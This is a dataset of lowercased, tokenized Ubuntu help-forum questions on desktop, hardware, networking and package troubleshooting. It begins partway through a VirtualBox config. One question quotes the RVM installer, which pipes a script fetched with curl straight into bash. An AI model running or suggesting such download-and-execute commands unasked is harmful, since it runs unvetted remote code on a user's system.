/storagecontroller > < storagecontroller name= '' sata controller '' type= '' ahci '' portcount= '' 1 '' usehostiocache= '' false '' ide0masteremulationport= '' 0 '' ide0slaveemulationport= '' 1 '' ide1masteremulationport= '' 2 '' ide1slaveemulationport= '' 3 '' > < attacheddevice type= '' harddisk '' port= '' 0 '' device= '' 0 '' > < image uuid= '' { 65de14de-f434-469b-a494-528e74e64938 } '' / > < /attacheddevice > < /storagecontroller > < /storagecontrollers > < /machine > < /virtualbox > any help.. ?
14668	asus eee 1005hab fan always running	i recently installed 10.10 on an eee 1005hab netbook and the fan is always running pretty loud . i am not too familiar with the acpi stuff , so i could n't seem to get it fixed . i do remember having this problem before on other laptops and it was usually a pretty easy fix . what are some common ways to fix this ? thanks !
14669	are `` file notes '' exclusive to nautilus ; is there a terminal cli ?	until today , i 've avoided using the file notes feature in nautilus ( properties ) , because of portability problems . ... but they are just so tantalizingly handy ! ... adding notes to a like-named text file works , but requires more juggling that the notes feature . so i 've decided to give the notes a try ; now that i 'm ( almost ) exclusively using ubuntu ... ( i 'm past the point of no return ; ) so a couple ( or three ) questions have come up . is this notes feature exclusive to nautilus ? is there a terminal cli for notes ... like the cli for trash ? is there a tool which can batch extract/convert the notes into individual similarly named text files ( or something similar ) for `` portability '' ?
14671	guake with zsh does n't start	i changed guake to use /bin/zsh from /bin/bash . now it doesnt start . by start , i mean that when click the shortcut key , guake just pops up for a second , and then disappears . i changed the default interpreter back to bash , and it works . what is the problem ? as an aside , how can i make zsh the default terminal shell ?
14672	is it possible to keep nm-applet running between invocations of wm startup ?	i am using nm-applet to interface with networkmanager , running xmonad as a window manager . my x sessions ( including nm-applet ) are set up with a /usr/local/bin/xmonad.start script . my question is , how can i keep nm-applet running in the background as long as x is running , but not necessarily xmonad ? as mentioned above , it is being started with xmonad ( and dying with it when xmonad is restarted , etc ) . i am using gdm to manage my x sessions , and i 'm running 10.10 . where 's a good place to start nm-applet to suit my particular needs ? i need to remove it from the control of xmonad , but do n't know where to start it otherwise . any help , tips , etc appreciated . edit : problem seems to be with how i have integrated xmonad . i have the session script as a file in /usr/share/xsessions/xmonad.desktop with the following contents : [ desktop entry ] encoding=utf-8 name=xmonad comment=lightweight tiling window manager exec=/usr/local/bin/xmonad.start icon=xmonad.png type=xsession /usr/local/bin/xmonad.start contains the following : # ! /bin/bash xrdb -merge ~/.xresources xcompmgr -c & trayer -- edge top -- align right -- setdocktype true -- setpartialstrut true -- expand true -- width 8 -- heighttype pixel -- height 18 -- transparent true -- alpha 0 -- tint 0x000000 & gnome-settings-daemon & gnome-screensaver & if [ -x /usr/bin/nm-applet ] ; then nm-applet -- sm-disable & fi /usr/bin/urxvtd -q -o -f & eval `ssh-agent` & if [ -x /usr/bin/gnome-power-manager ] ; then sleep 1 gnome-power-manager & fi /usr/bin/gnome-volume-control-applet & exec xmonad the question is how do i integrate xmonad , gdm , x , etc in such a manner to replicate the behavior i currently have except with nm-applet ( and possibly other programs ) running whether or not xmonad is ?
14673	typing tutor games with good playablity	are there any linux typing tutor games which are enjoyable games in their own right ? i 'm a computer professional , but have never learned to type properly . i also do n't want my kids to pick up my bad habits ! the kids are okay with tuxtyping , for a time . something like typing of the dead sounds great , but is windows only , and as far as i can tell one of a kind . i also do n't want the young'uns hooked on first person shooters just yet . so are there any quality typing games for a range of ages ?
14674	how to change font size which ca n't be picked from 'font ' setting	i installed macbuntu for my ubuntu 10.04 . the theme is nice and cool . i want to change the font size to larger . i open the 'appearance ' preference , i find macbuntu changed the font of system to 'lucida grande ' . however i ca n't find the 'lucida grande ' in the font list , so i ca n't change the font size from 9 to 12 . could anybody give me a hint how to change the font size for 'lucida grande ' ?
14681	devanagari fonts displayed improperly in chromium	i cant view devanagari ( marathi/hindi ) fonts properly in : chromium 7.0.531.0 ( 60146 ) built on ubuntu 9.04 , running on ubuntu 10.04 the same is at my home , running 10.04 . here are some screenshots : as you can see , some text overlaps the other . i have not changed any settings , its the default . at first i thought wine was responsible for screwing up the fonts , but on a different machine with a different version , the same problem occurs , so i am blaming chromium for the problem . any ideas how to get it working ?
14685	what does package < package > has no installation candidate mean ?	what does the above error mean ? what is an installation candidate ? i was trying to do sudo apt-get install munin-memcached and i get this message : reading package lists ... done building dependency tree reading state information ... done package munin-memcached is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package munin-memcached has no installation candidate i googled for the problem and someone said to do a apt-get upgrade but it still did not solve my problem .
14686	kindle for pc via wine	i 've been checking out all the free books on amazon and i really want to get the kindle pc program running on my computer so i can download , read , and manage my e-books . i realize that calibre can be used to manage e-books and i do have that downloaded . however , amazon wo n't let me download ebooks unless my pc is registered in their little kindle program and i 'd like to just keep things streamlined by playing by the rules for once . i 've viewed so many tutorials and advice for setting it up . i have wine , i have kindle for pc , i set it to win98 , all of that . however , when i try to open kindlepc from the wine menu or from the desktop icon , nothing happens . no error messages , nothing . i do n't know what might be wrong . please let me know if you have any experience with this and any suggestions !
14697	what is the best screen video+audio capture programm for dual monitor ?	there are many video tutorials on youtube . what software should i use for creating a video tutorial ? i installed xvidcap ( software center 10.04 ) but it seems not support 2 monitors , when i click on record xvidcap disappear does not capture the screen . write here down what software you use ?
14700	how can i write nautilus scripts in python ?	i want to write a nautilus script in python . is that possible ? if it is possible , how can i do that ?
14703	how to set different environment variables for different hosts	we are using nis and automount for *nix developing hosts . so i can login any host with the same identity and same home directory . i hope to set different environment variables when login different hosts . for example , i want to set the ld_library_path with some value when login the solaris host . however i do n't set it when login the linux host . how should i do ?
14704	how can i make a new video out of specific bits from a video cd ?	i have a video cd ( vcd ) , and there are specific parts i 'm interested in : a few seconds here , a few seconds there . i 'd like to extract only those bits , into a new video file ( or files ) . how can i do this ? i know there are many video editing software for ubuntu , but there are too many to try , and they do n't all accept a vcd as-is ... so i 'd like some help with the entire workflow . in case there are no gui software , i 'm fine with using the commandline , as long as i do n't have to read manpages in too much detail . : - ) thanks ,
14706	gnome-panel will not start after running purge command	foolishly , in an attempt to remove some confusion i was having over my email clients , i ran the commands : sudo apt-get purge thunderbird* sudo apt-get purge evolution* unfortunately this has backfired somewhat as i now dont appear to have gnome panel installed . i can reinstall that easily enough , but im also wondering what i else i might have deleted by running these commands ? ** edit ** i also appear to have lost the me menu , as well as the session manager applet . they are showing as being installed in synaptic , but they dont show up in the list of applets to add to the panel .
14714	making touchpad and resume password changes permanent	in ubuntu 10.10 i really do n't want any password on resume on my eeepc , so i have to run gconftool-2 -- set -- type=bool /apps/gnome-power-manager/lock/suspend false and i want two finger middle click , so i have to run xinput set-prop `` etps/2 elantech touchpad '' `` synaptics tap action '' 8 , 9 , 0 , 0 , 1 , 2 , 3 ( that gpointingdevice package ca n't do anything for me ) those work , but only until the next resume . for some strange reason ubuntu always overrides these changes . i put both commands into a script in /etc/pm/sleep.d/ , but even then after resumes the changes are gone . where is this strange behavior coming from ? and how do i make those changes permanent ?
14719	alternating virtual and native boots of virtual disk	would anyone know of a virtual machine software that is able to boot off wubi-created root.disk 's ? failing that , would anyone know of a virtual machine software whose virtual disks are also natively bootable so one could alternate virtual and native boots off the same virtual disk ?
14721	where does zeitgeist store its data ?	i want to move zeitgeist data for a user from one computer to another . he uses gnome activity journal , and it would be nice to move his history .
14723	where can i get a postgres 9.0 package ?	i want to use postgres 9.0 in ubuntu . does anybody know any repository that already has the debian package for postgres 9.0 ? do you think i should wait for the next ubuntu release or postgres 9.0 is still far ahead to be in the official repository ? thanks heaps .
14726	what constitutes a bug ?	actually what is a bug ? any predefined rules ?
14731	is it possible to have separate x screen with separate sound ?	i have nvidia card ( fx5200 ) that has been configured `` separate x screen '' . so that vga picture is on my monitor and dvi is connected with tv . now i 'm wondering is it possible to stick another sound card into computer and have local sound near my monitor and apps that and running on the tv screen , their sound will be sent to tv ( via analog line , 3.5mm jack ) ?
14733	how can i get a usb floppy drive to work ?	i have a toshiba usb floppy drive that i need to use under ubuntu . when i connect it , and insert a floppy disk in it , i do not see anything mounted under ubuntu 10.10 . i was suspecting the hardware and/or the floppy disk to be defective , and so i tested the floppy disk as well as the floppy drive itself under windows xp , and everything was just fine . i was able to find the following instructions : add the following line to the /etc/modules file : floppy enter the following shell commands : mkdir /media/floppy mount -t vfat /dev/sdc /media/floppy -o uid=1000 this will mount the floppy , but i would like this to happen automatically , so when i connect the drive to the usb port , it automatically mounts the floppy . how can i make this work ? or does ubuntu only work with internal floppy drives ?
14736	improve sensitivity of zoom pointer	i hope i can make myself clear , but i find myself struggling more often than not when i want to zoom any window in ubuntu 10.10 . the pointer has to be positioned very nearly pixel-perfect before i get a zoom-pointer and get the ability to zoom the window . this is especially true if you want to zoom from any of the bottom corners . is there some way so make this process a bit more forgiving ? when i am in the vicinity of the corner i would like to be able to zoom . so is there a setting to increase the margin , the area ... or other ways to somehow make my zooming life easier : )
14740	force fsck.ext4 on reboot , but really `` forceful ''	one of my ubuntu 10.04 servers is giving me trouble . when i run fsck.ext4 -n /dev/sda5 it tells me there are errors in the free inode count , free block count , and more . i have tried : touch /forcefsck also tried : shutdown -rf now and still , after reboot , i see errors . i also just checked on my eeepc netbook , ubuntu 10.10 , and have the same issue ! how can i force a really `` forced '' `` forceful '' `` seriously fix my filesystem '' fsck of the `` / '' filesystem on reboot ? clarification : i run fsck.ext4 -n because it 's a mounted filesystem , to check if there are errors . this tells me that there are . i thought that the automatic fsck every 30 mounts during the boot-up process is precisely to take care of errors in the root filesystem . but it does n't do it in my case . i could reboot with a livecd and fix the errors , and then reboot again , but that 's some serious downtime for a live server . a reboot , auto fsck , then continue booting is much more sustainable on a live server , and i believe should be the right behaviour . additional info : here is the output . it looks like something that the autofsck would fix , does n't it ? root @ server : ~ # fsck.ext4 -n /dev/sda5 e2fsck 1.41.11 ( 14-mar-2010 ) warning ! /dev/sda5 is mounted . warning : skipping journal recovery because doing a read-only filesystem check . /dev/sda5 contains a file system with errors , check forced . pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information free blocks count wrong ( 1849368 , counted=1948909 ) . fix ? no free inodes count wrong ( 545504 , counted=552134 ) . fix ? no /dev/sda5 : ********** warning : filesystem still has errors ********** /dev/sda5 : 116752/662256 files ( 0.2 % non-contiguous ) , 795324/2644692 blocks
14743	is there any way to get a roaming profile in ubuntu with say ubuntu one , dropbox , rsync , etc ?	basically my situation is where i jump from machine to machine ( about 3 of them ) to do development . i have used no machine in addition to synergy to try and fix my issue . what i basically want is dropbox , ubuntu one , rsync , etc . to sync up all my files as well as config files ( parameters for apache , php , mysql , etc ) . does anyone know if this is possible ? is there something equivalent to portable apps for linux in where things are installed in my local directory then on the other machines i can just use symlinks to point to these files ? i am open to suggestions , it 's just a pain having to replicate the same config when i jump machines or having to remote in as i want my local machines processing power for development .
14745	how can i undo the effects of grub-reboot ?	i accidentally ran sudo grub-reboot 4 ( background ) twice in a row , and now grub permanently boots to the fourth menu item . how can i restore the default boot behavior ?
14750	convert chm to pdf or ms word or open office word processor ?	is it possible to convert chm to pdf or word in gui fashion
14751	adding dictionaries to goldendict	i have goldendict installed in my ubuntu 10.10 . i am downloading a spanish-english dictionary in order to add it into the dictionary database of goldendict . once i add a path to search for the dictionary files and click on rescan now button in order to tell goldendict to index the new dictionary goldendict starts to index the dictionary and this process does n't finish never . goldendict hangs on so that i need to kill it from the process . the dictionary i am trying to add is a file of 23.5mb . i could add other dictionaries of 8-10mb but not this one . any idea to solve my problem ?
14753	appmenu has disappeared after panel restore	after getting past this hurdle : gnome-panel will not start after running purge command i seem to ave lost appmenu . all of the packages related to it have been installed , however it does not show up in the 'add to panel ' menu . do i need to enable something else in order to see it ?
14755	logitech usb headset does not work correctly with skype	how can i configure skype to correctly use my logitech usb headset microphone ? i use skype 2.1 ( beta ) with the following usb headset : input : logitech logitech usb headset as /devices/pci0000:00/0000:00:1d.2/usb8/8-1/8-1:1.3/input/input6 generic-usb 0003:046d:0a0c.0002 : input , hidraw1 : usb hid v1.00 device [ logitech logitech usb headset ]
14763	where are the apache and php log files ?	i 've installed apache , php , and mysql on ubuntu 10.10 desktop edition , and it 's working fine . except i have no clue where to look for apache or php log files .
14765	good and easy way to share files on local machine	i would like to have a directory that has following properties : many users can copy files into it these files can be deleted/changed by these users ( user a can delete/modify file that was copied into this directory ) it cant be done using normal file permissions ( because permissions are retained on copy ) . here is what i found on the net : brainstorm idea blueprint some use cases : sharing music on local machine simple git repository sharing ( just make a bare repository writeable to many people ) -- - i know that there are solutions like gitosis allow many developers to modify test instance of php app without giving them root ( i guess they would copy files ) -- - i 'm leading a team of nonprofit junior developers and i need to keep that one simple ! edit afaik setting sgid bit is not enugh , it only affects newly created files -- - and basic workflow for these use cases ivnolves copying and other operations ( which cleave file 's gid unchanged )
14768	how do nautilus media handlers work ?	nautilus has options for what to do when media devices are added . how does nautilus know what applications to make available in these drop-down menus ? how do applications plug themselves in to this mechanism ?
14774	how to enable a user to login through ftp ?	i have installed vsftp on ubuntu 10.10 . i want to give the user ftp login privilage .
14778	how can i trace a crash in a program that crashes x ?	skype is crashing my entire x server , and the bug i reported ( since fixed ) is no longer relevant , nor useful . i 've found an alternate client , but now someone wants to use rooms ( and it 's imperative ) , so i need to get this fixed . what should i do to trace where the crash is coming from ? it crashes the xserver , so basically , i 'm at a loss .
14780	how can i disable xinerama ?	i do n't think it is running , but according to a bug report and a forum post ( i 'll add the links later ) disabling it should stop skype from crashing . is there a way to know if it is enable , and if it is to disable it ? i 'm on an nvidia card , using twinview . there should not be any xinerama btw .
14782	how to replace a default video player in 10.04 ?	for example with vlc or any other good player .
14785	how can i see large thumbnails of the files i want to attach to an e-mail ?	when i want to attach a file ( an image ) with evolution , it 's very hard to pick the good file because thumbnails are way to small . how can i make them bigger ?
14790	how to show notification when a usb device is inserted ?	it would be good to know that when you connect a usb device like a web-cam , it notifies me that it works or not .
14791	two accounts on same computer how to make a share folder for both ?	i need a shared folder . i and my wife need to exchange files on same computer . how to do that ?
14794	how do i shut down without the confirmation prompt ?	are you sure you want to close all programs and shut down the computer ? when i click shut down i want to shut down ! : ) this message bugs me . how to avoid this message ?
14795	manually set track listen count in banshee ?	how can i manually edit the track play count for a track for banshee ?
14806	how to change virtualbox keyboard shortcut	in virtualbox ctrl-r is the shortcut to reset the virtual machine . but i use it for testing web-sites on ie , and i seem to be hard-wired to use ctrl-r to refresh web-pages in a browser . i keep accidentally resetting virtualbox and having to wait while it books again ! ! so is there some way to change the keyboard shortcuts in virtualbox ?
14810	from init.d to upstart , is there a bridge ?	i 've got a perfectly good script for use in /etc/init.d . in fact , i have a lot of them , all created with the tanuki java service wrapper . it would seem to me that there could be a simple template for wrapping such a shell script up as an upstart script , but a bit of googling is not revealing one . am i missing something ?
14815	unity menu ( desktop design ) , how will it act ?	is it known whether or not unity will have the option to act like the current custom gnome menus ( applications , places , system ) ? from what i 've seen they 've designed it to take up the whole desktop when the menu is opened . also , the file , view , edit menus , will it be possible to have them stay within the application itself rather than be displayed within the top panel ?
14816	when i boot-up i get this dialog : `` backup failed : failed with an unknown error ''	backup failed failed with an unknown error . when i booted-up this morning i got a dialog which presented the above message and no other information ! the dialog is `` helpful '' in that it tells me something is wrong , but i have no idea what it is referring to ; so it is n't actually helpful . what might be causing this `` backup '' error when i am starting the system ? i 've restarted several times and keep getting the same message . i checked the disks using system -- administration -- disk utility via a live-cd , and it reported no errors . i 've just now noticed one tell-tale sign which is probably significant , but i do n't know how to interpret it ... my normal routine , with two of my drives ( single partition per drive ) is to manually mount them ( via nautilus ) ... however , what i 've just noticed is that one of them is showing as already mounted at startup , which has not been the case prior to today ... i have n't got the hang of this mounting `` stuff '' yet ... . but this seems to be a relevant point ...
14825	booting from a usb drive with an existing dual-boot environment	i have an ubuntu 10.10 / windows 7 dual boot environment . occasionally , i want to boot directly off a usb stick or usb-connected portable hd and either by-pass the dual-boot grub loader or add a boot option for the bootable usb device ( s ) . note : the usb boot option is set as a higher prior than the hd option in the bios , and the usb devices boot as expected in a single os environment . problem : in a dual boot grub environment , the bios priority setting is essentially ignored . what is the best approach to booting off a usb device in this scenario , adding `` cdrom-detect/try-usb=true '' to an existing grub entry ... or another solution ?
14829	unable to browse windows 7 notebook from ubuntu	i can see and connect to ubuntu box from windows 7 laptop , but the ubuntu box keeps telling me failed to retriever share list from server . the laptop shows up in the list of computers in the workgroup but even when connecting by using the ip address , i get an error can not display location `` smb : //xxx.xxx.x.xx and failed to retrieve share list from server ... ... pleas advise what could be wrong . ubuntu box is running a 32 bit version of the os whereas the windows 7 laptop is running an x64 version of win7 & ult .
14837	how can i install insight debugger ?	i am following along a book in which insight debugger is required . i did n't find it on my maverick . i googled and i found that it 's not supported in debian anymore but i really need to install it . i tried to compile the source and it installed but keep telling me that tk is missing whenever i start it . i installed tk with sudo aptitude install tk then tried to run again it 's the same . i compiled it one more time and nothing really changes . so please how can i install that ? update : this is the message i get tk_init failed : ca n't find a usable tk.tcl in the following directories : /usr/local/share/tk8.4 /usr/local/lib/tk8.4 /usr/lib/tk8.4 /usr/local/library /usr/library /usr/tk8.4.1/library /tk8.4.1/library /usr/local/share/tk8.4/tk.tcl : no event type or button # or keysym no event type or button # or keysym while executing '' bind listbox < mousewheel > { % w yview scroll [ expr { - ( % d / 120 ) * 4 } ] units } '' ( file `` /usr/local/share/tk8.4/listbox.tcl '' line 182 ) invoked from within '' source /usr/local/share/tk8.4/listbox.tcl '' ( in namespace eval `` : : '' script line 1 ) invoked from within '' namespace eval : : [ list source [ file join $ : :tk_library $ file.tcl ] ] '' ( procedure `` sourcelibfile '' line 2 ) invoked from within '' sourcelibfile listbox '' ( in namespace eval `` : :tk '' script line 4 ) invoked from within '' namespace eval : :tk { sourcelibfile button sourcelibfile entry sourcelibfile listbox sourcelibfile menu sourcelibfile panedwindow sourcelibfile ... '' invoked from within '' if { $ : :tk_library ne `` '' } { if { [ string equal $ tcl_platform ( platform ) `` macintosh '' ] } { proc : :tk : :sourcelibfile { file } { if { [ catch { namesp ... '' ( file `` /usr/local/share/tk8.4/tk.tcl '' line 393 ) invoked from within '' source /usr/local/share/tk8.4/tk.tcl '' ( `` uplevel '' body line 1 ) invoked from within '' uplevel # 0 [ list source $ file ] '' this probably means that tk was n't installed properly .
14838	is there a simple way to add exfat support ?	is there a simple way to add exfat support to ubuntu without kernel patching ?
14844	listening to , and changing tracks on another pc on a lan ?	rhythmbox runs on a pc in my network , and i was wondering if it would be possible to change the track , volume etc from my pc ? both pcs run 10.04 . thanks .
14845	unable to connect to freenode because of open proxy	when i connect to freenode , i am getting the following error . you are banned from this server- your host is an open proxy ( http get ( 3128 ) ) . email proxyscan @ freenode.net when corrected . karthick [ ~karthick @ 117.206.87.12 ] has quit [ k-lined ] error closing link : 117.206.87.12 ( k-lined ) irssi : connection lost to irc.freenode.net i am using squid in my standalone system to block few websites and downloads.here is my squid configuration . acl manager proto cache_object acl localhost src 127.0.0.1/32 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 acl ssl_ports port 443 acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect acl badurl url_regex -i movie acl badurl url_regex -i movies acl badurl url_regex -i chat acl whitelist dstdomain `` /etc/squid3/whitelist '' acl bad url url_regex `` /etc/squid3/websites '' acl badurl url_regex `` /etc/squid3/blockdownload '' acl badurl url_regex `` /etc/squid3/blockedsites '' http_access allow manager localhost http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow whitelist http_access deny badurl icp_access deny all htcp_access deny all http_port 3128 hierarchy_stoplist cgi-bin ? access_log /var/log/squid3/access.log squid refresh_pattern ^ftp : 1440 20 % 10080 refresh_pattern ^gopher : 1440 0 % 1440 refresh_pattern ( cgi-bin|\ ? ) 0 0 % 0 refresh_pattern . 0 20 % 4320 icp_port 3130 some said enabling squid authentication will solve my problem.but i am not sure on doing that.any suggestions ? ?
14847	gui tool to configure ldap client	i am using this wiki to configure ldap client in ubuntu . now i am looking for a gui tool to configure ldap client in ubuntu . because my colleagues ( they do n't have much technical knowledge ) often complains that configuring ldap client in ubuntu is little difficult . is there any simple gui tool for this ? .
14848	how does the command for installing rvm work ?	a newbie question.. i was installing rvm ( a tool to manage ruby versions ) . the command for it is : bash < < ( curl http : //rvm.beginrescueend.com/releases/rvm-install-head ) i know a little bit that the < is a command redirection operator ( correct ? ) . then , why is the second < needed ( what does it do ) ?
14849	how to use xbox 360 wireless gaming controller ?	im curious about the usage of the controller to play any games , like ... does it even work in linux ? , if so do i need a driver of some sorts ?
14850	where is the journal stored ?	i was reading trough the link on journaling-filesystems and i would like to know where exactly is the journal stored in my harddisk . some pointers on this image shown below thanks , sen
14858	how to define a secondary ip address that is down by default	i can define a secondary ip address on the same network card by adding the lines auto eth0:1 iface eth0:1 inet static address 192.168.9.101 ... to /etc/network/interfaces . this gives me an ip address that i can turn on or off using ifup and ifdown . however , by default it is on . from reading the man page , it seems that to have it off by default i just need to remove the line auto eth0:1 . however , this makes ifup/down not work at all . is there a way to do this ? update : ok , so the problem was a lot simpler than i thought . here 's what i originally did : root @ dev003 : ~ # cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.2.101 netmask 255.255.0.0 network 192.168.0.0 broadcast 192.168.255.255 gateway 192.168.1.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 192.168.1.1 auto eth0:1 iface eth0:1 inet static address 192.168.9.101 netmask 255.255.0.0 network 192.168.0.0 broadcast 192.168.255.255 gateway 192.168.1.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 192.168.1.1 root @ dev003 : ~ # /etc/init.d/networking restart * reconfiguring network interfaces ... ssh stop/waiting ssh start/running , process 3339 ssh stop/waiting ssh start/running , process 3373 [ ok ] root @ dev003 : ~ # ifconfig eth0 link encap : ethernet hwaddr 08:00:27:03:43:82 inet addr:192.168.2.101 bcast:192.168.255.255 mask:255.255.0.0 inet6 addr : fe80 : :a00:27ff : fe03:4382/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2836310 errors:0 dropped:0 overruns:0 frame:0 tx packets:2806585 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:220309837 ( 220.3 mb ) tx bytes:187167315 ( 187.1 mb ) eth0:1 link encap : ethernet hwaddr 08:00:27:03:43:82 inet addr:192.168.9.101 bcast:192.168.255.255 mask:255.255.0.0 up broadcast running multicast mtu:1500 metric:1 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1909267 errors:0 dropped:0 overruns:0 frame:0 tx packets:1909267 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:160262241 ( 160.2 mb ) tx bytes:160262241 ( 160.2 mb ) root @ dev003 : ~ # sed -i 's/auto eth0:1/ # auto eth0:1/ ' /etc/network/interfaces root @ dev003 : ~ # /etc/init.d/networking restart * reconfiguring network interfaces ... siocdelrt : no such process ssh stop/waiting ssh start/running , process 3787 [ ok ] root @ dev003 : ~ # ifconfig eth0 link encap : ethernet hwaddr 08:00:27:03:43:82 inet addr:192.168.2.101 bcast:192.168.255.255 mask:255.255.0.0 inet6 addr : fe80 : :a00:27ff : fe03:4382/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2840372 errors:0 dropped:0 overruns:0 frame:0 tx packets:2810267 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:220637496 ( 220.6 mb ) tx bytes:187451978 ( 187.4 mb ) eth0:1 link encap : ethernet hwaddr 08:00:27:03:43:82 inet addr:192.168.9.101 bcast:192.168.255.255 mask:255.255.0.0 up broadcast running multicast mtu:1500 metric:1 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1911328 errors:0 dropped:0 overruns:0 frame:0 tx packets:1911328 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:160435069 ( 160.4 mb ) tx bytes:160435069 ( 160.4 mb ) root @ dev003 : ~ # ifdown eth0:1 ifdown : interface eth0:1 not configured this is the point where i got stuck , and figured there 's something wrong with using ifup/down in such a configuration . as it turns out , the solution is quite simple : root @ dev003 : ~ # ifup eth0:1 ssh stop/waiting ssh start/running , process 3829 root @ dev003 : ~ # ifdown eth0:1 root @ dev003 : ~ # ifconfig eth0 link encap : ethernet hwaddr 08:00:27:03:43:82 inet addr:192.168.2.101 bcast:192.168.255.255 mask:255.255.0.0 inet6 addr : fe80 : :a00:27ff : fe03:4382/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2840609 errors:0 dropped:0 overruns:0 frame:0 tx packets:2810473 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:220656625 ( 220.6 mb ) tx bytes:187469288 ( 187.4 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1911447 errors:0 dropped:0 overruns:0 frame:0 tx packets:1911447 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:160445053 ( 160.4 mb ) tx bytes:160445053 ( 160.4 mb ) thanks @ gilles for calling me out , and thanks @ marius for the alternate solution .
14859	apt-get with no http/ftp access	is it possible to install packages using apt-get install without having http access ? in other words , can apt-get install packages from a small local repository ? i know i can use sudo dpkg -i deb_file to install a package , but this will install only one package at a time and it will fail if the dependencies are not met . this will be a problem if i want to install a package that has many dependencies even if i already have all the required .deb files .
14863	how to auto mount a flash drive with root and read/write/execute privileges	i have an issue with mounting my flash drive on ubuntu 10.04 with write privileges . it 's currently partitioned as fat32 with label kingston but when i insert it into the laptop it reads it as usb0 , read-only privileges . what i 've had to do so that it is writable is to unmount it using disk utility and mount it again , and then it picks it up as kingston with root privileges . what i want is to automatically mount the flash drive with root privileges without going to disk utility to set this . any help would be appreciated .
14866	what are shells ?	what 's a shell , their importance , types and functions ?
14873	how to run multiple user x sessions on the same computer , at the same time ?	i want to have more than one user logged on at the same time , on the same computer . each user should have a full gui x session ... it 's easy enough to log in to multiple concurrent non-x linux terminals ... but i want the x factor ... maybe i 've missed something , but i only see a main menu option to log out of the current user , and nothing for `` switch user '' ... is there a simple way to do this ?
14877	how do i show my entire screen with a projector ?	i have a problem making my entire screen shown , which is a problem when i want to show other people how to do anything in ubuntu . i can choose between showing a part of my screen , or another part , but still not the entire screen . menu - system - preferences - monitors ( i have nvidea graphics , with nvidea driver ) it appears that your graphics driver does not support the necessary extensions to use this tool . do you want to use your graphics driver vendor 's tool instead ? and i get the chance to say yes or no . yes for nvidea driver configuration and no for ubuntu 's inbuilt ( whatever it is ) in which i can configure the size of whats shown on the projector . how do i show my entire desktop ?
14879	easy way to forward all email	is there an easy way to install a mta on ubuntu and forward all email to a different remote email box ? only want to forward local email and looking for something dead simple . thank you ! clarification : i see that ssmtp and nullmailer are suggested , but i need something ( just a ) little more clever . i have one machine ( machine.domain1.com ) where i want local mail to be delivered at realuser @ domain2.com and i want it delivered through direct connection to mx.domain2.com so when i do mail root on machine1.com it should get forward to realuser @ domain2.com . issue with nullmailer and ssmtp is that forwarding is done to mx.domain2.com but mail is delivered with a rcpt to set to root @ domain1.com and i want the rcpt to set to realuser @ domain2.com possible with a simple solution or do i need to digg into postfix or exim for this ?
14881	mistaken dist-upgrade , is this bad ?	i was looking for update manager on ubuntu 10.10 netbook edition and could n't find it , so in terminal i did : sudo apt-get update sudo apt-get upgrade i got a message saying some packages were `` held back '' and searching online gave me the suggestion to do : sudo apt-get dist-upgrade so i did that and it updated my kernel and now uname -a says i have 2.6.35-23-generic # 40-ubuntu smp . my system is still working normally , but i 'm now second-guessing if i did the right thing . was this kernel update meant for the next version of ubuntu ? should i try to back it out ?
14885	how can i exclude all the svn metadata while synchronizing with unison ?	how can i exclude all the svn metadata while synchronizing with unison ? so that all subfiles/folders are also ignored ! thank you for you help
14886	how to remove kde and xfce applications from gnome menu ?	i am new to linux . i installed kubuntu-desktop and xubuntu-desktop over the default ubuntu 10.10 . i want to unclutter the menu , so that applications related to a particular desktop appear in menu only during their respective sessions . ( i.e. , no kde and xfce apps in menu during ubuntu gnome session . similarly in kde and xfce sessions . ) how can this be done via command line ? ( i want to learn things the command-line way . ) should i backup anything before i do this ? extra information : i googled and found this and other solutions in forums , but these address only the kde on gnome scenario . perhaps this can be modified to include xfce as well , but since i am a newbie , i could n't figure out how to do it . i have also cross-posted at unix.stackexchange gracias ! thanks !
14899	what software do you recommend to manage tv series ?	i need a software to manage tv series , i.e rename episodes ( using tvrage or other providers ) and flagging episodes as watched in order to know which episodes i have not watched yet . do you know something like that ?
